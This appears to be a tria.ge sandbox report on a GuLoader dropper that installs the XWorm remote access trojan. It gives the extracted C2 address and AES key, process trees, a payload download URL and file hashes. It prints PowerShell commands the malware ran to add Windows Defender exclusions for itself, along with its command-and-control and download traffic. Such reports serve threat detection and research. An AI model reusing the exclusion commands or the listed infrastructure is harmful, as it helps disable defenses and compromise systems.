Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

18ea5087eb...50.exe

windows11-21h2-x64

10

$PLUGINSDI...em.dll

windows11-21h2-x64

3

Resubmissions

24/11/2024, 15:40 UTC

241124-s4cllssndp 10

24/11/2024, 15:36 UTC

241124-s1w6vasmdk 10

Analysis

  • max time kernel
    59s
  • max time network
    69s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/11/2024, 15:40 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    18ea5087eb82e075ca35d2b2dcff9450.exe

  • Size

    555KB

  • MD5

    18ea5087eb82e075ca35d2b2dcff9450

  • SHA1

    dc436fbaa777672d44a8b90b98c4a1c266885845

  • SHA256

    a7247c64cc0168290ca3b210e59ef629b46f513205bc6562ec79cdd2cda71725

  • SHA512

    8fbeb3caf13a3fe1359002c2848ff5767e6b2f226049546c683f2b6144756196cfe39f66e4959c8426cdfaeff6a169a4cf5939de241e4a898887d8810ec620c6

  • SSDEEP

    12288:32EIiN/Z1++w1p+wJuQbIgJwCQBk5wBcamd3ZhZs:3wiN/K+wHBfhQBk5s3mdPZs

Score
10/10
guloaderxwormdiscoverydownloaderexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

87.121.86.8:4020

Mutex

ssjpS2lhbkGsnEgT

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain
1
9g5AvmiEFB6IX39iQ9WYsA==

Signatures

  • Detect Xworm Payload 1 IoCs
  • Guloader family
    guloader
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe
    "C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:3628
    • C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe
      "C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe"
      2⤵
      • Drops startup file
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4720
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\18ea5087eb82e075ca35d2b2dcff9450.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2248
    • C:\Windows\system32\OpenWith.exe
      C:\Windows\system32\OpenWith.exe -Embedding
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3224

    Network

    • flag-us
      DNS
      mertvinc.com.tr
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      8.8.8.8:53
      Request
      mertvinc.com.tr
      IN A
      Response
      mertvinc.com.tr
      IN A
      185.244.144.68
    • flag-us
      DNS
      68.144.244.185.in-addr.arpa
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      8.8.8.8:53
      Request
      68.144.244.185.in-addr.arpa
      IN PTR
      Response
      68.144.244.185.in-addr.arpa
      IN PTR
      185-244-144-68birbircomtr
    • flag-tr
      GET
      http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
      18ea5087eb82e075ca35d2b2dcff9450.exe
      Remote address:
      185.244.144.68:80
      Request
      GET /SJatcRCUnkMIpuGcrVu155.bin HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
      Host: mertvinc.com.tr
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Connection: Keep-Alive
      Content-Type: application/octet-stream
      Last-Modified: Wed, 20 Nov 2024 06:43:56 GMT
      Etag: "8e40-673d852c-bd5a9871c8854887;;;"
      Accept-Ranges: bytes
      Content-Length: 36416
      Date: Sun, 24 Nov 2024 14:47:17 GMT
      Server: LiteSpeed
      X-Powered-By: PleskLin
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • 185.244.144.68:80
      http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin
      http
      18ea5087eb82e075ca35d2b2dcff9450.exe
      1.7kB
       38.0kB
       32
      31

      HTTP Request

      GET http://mertvinc.com.tr/SJatcRCUnkMIpuGcrVu155.bin

      HTTP Response

      200
    • 87.121.86.8:4020
      18ea5087eb82e075ca35d2b2dcff9450.exe
      260 B
       5
    • 87.121.86.8:4020
      18ea5087eb82e075ca35d2b2dcff9450.exe
      208 B
       4
    • 8.8.8.8:53
      mertvinc.com.tr
      dns
      18ea5087eb82e075ca35d2b2dcff9450.exe
      134 B
       192 B
       2
      2

      DNS Request

      mertvinc.com.tr

      DNS Response

      185.244.144.68

      DNS Request

      68.144.244.185.in-addr.arpa

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
       90 B
       1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d0c46cad6c0778401e21910bd6b56b70

      SHA1

      7be418951ea96326aca445b8dfe449b2bfa0dca6

      SHA256

      9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

      SHA512

      057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      18KB

      MD5

      db92d7041e62fca2713935081f1c4a78

      SHA1

      8c0fd39ff312916983080f1cfc7ec620686c1d07

      SHA256

      29b298203b31984a0a51e20d9d816b5fda7013a8390d93d327ec2a72486d65b9

      SHA512

      ecd20994c634bda0d20a344fe1cdea7f00154b83f19213a4d1205aec21deb1f03d1eb85c9c93bd7a6cc000dbdb6d1acfdf81d072c715b6a2d53067298b1f7359

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      18KB

      MD5

      6fc9e38f184d3b1e45cdc8758b9346b6

      SHA1

      7bce57efd6a77a3bfe8c53ad443e3faa18740568

      SHA256

      21e6f547ca65e845c9e4fb8e278689b07b124a93d435143a8e0eec4151d62391

      SHA512

      894805a8282c72f355a50216329e682fc36981789f1cdcfe48d3a6383d875f8f270bb29a98e3039dd6007eb49e86c29f68f8e20548a81c4eaf4bae0aa70fed07

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbnwudxm.3r4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\nsq88F7.tmp\System.dll
      Filesize

      11KB

      MD5

      75ed96254fbf894e42058062b4b4f0d1

      SHA1

      996503f1383b49021eb3427bc28d13b5bbd11977

      SHA256

      a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7

      SHA512

      58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

      Download Submit

    • memory/2988-88-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3188-102-0x0000000037200000-0x00000000377A6000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3188-14-0x00000000007E0000-0x0000000001AF7000-memory.dmp

      Filesize

      19.1MB

      Download

    • memory/3188-15-0x00000000007E0000-0x00000000007F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3188-16-0x0000000036900000-0x000000003699C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3188-18-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/3188-104-0x00000000379D0000-0x00000000379DA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3188-103-0x0000000037910000-0x00000000379A2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3188-12-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/3628-13-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

      Download

    • memory/3628-11-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

      Download

    • memory/3628-10-0x00007FF9377C0000-0x00007FF9379C9000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/3628-9-0x00007FF9377C1000-0x00007FF9378EA000-memory.dmp

      Filesize

      1.2MB

      Download

    • memory/3628-8-0x0000000002F00000-0x0000000005439000-memory.dmp

      Filesize

      37.2MB

      Download

    • memory/4584-35-0x0000000006DC0000-0x0000000006DF4000-memory.dmp

      Filesize

      208KB

      Download

    • memory/4584-53-0x0000000007D90000-0x0000000007DA5000-memory.dmp

      Filesize

      84KB

      Download

    • memory/4584-36-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4584-45-0x00000000079D0000-0x00000000079EE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4584-46-0x0000000007A00000-0x0000000007AA4000-memory.dmp

      Filesize

      656KB

      Download

    • memory/4584-47-0x0000000008180000-0x00000000087FA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4584-48-0x0000000007B40000-0x0000000007B5A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4584-49-0x0000000007BB0000-0x0000000007BBA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4584-50-0x0000000007DE0000-0x0000000007E76000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4584-51-0x0000000007D50000-0x0000000007D61000-memory.dmp

      Filesize

      68KB

      Download

    • memory/4584-52-0x0000000007D80000-0x0000000007D8E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4584-34-0x0000000006830000-0x000000000687C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4584-54-0x0000000007EA0000-0x0000000007EBA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4584-55-0x0000000007E80000-0x0000000007E88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4584-33-0x0000000006800000-0x000000000681E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4584-19-0x0000000002FE0000-0x0000000003016000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4584-32-0x0000000006350000-0x00000000066A7000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4584-20-0x0000000005BD0000-0x00000000061FA000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4584-23-0x00000000062E0000-0x0000000006346000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4584-22-0x0000000006270000-0x00000000062D6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4584-21-0x0000000005960000-0x0000000005982000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4720-69-0x000000006E4E0000-0x000000006E52C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4720-59-0x0000000005B30000-0x0000000005E87000-memory.dmp

      Filesize

      3.3MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.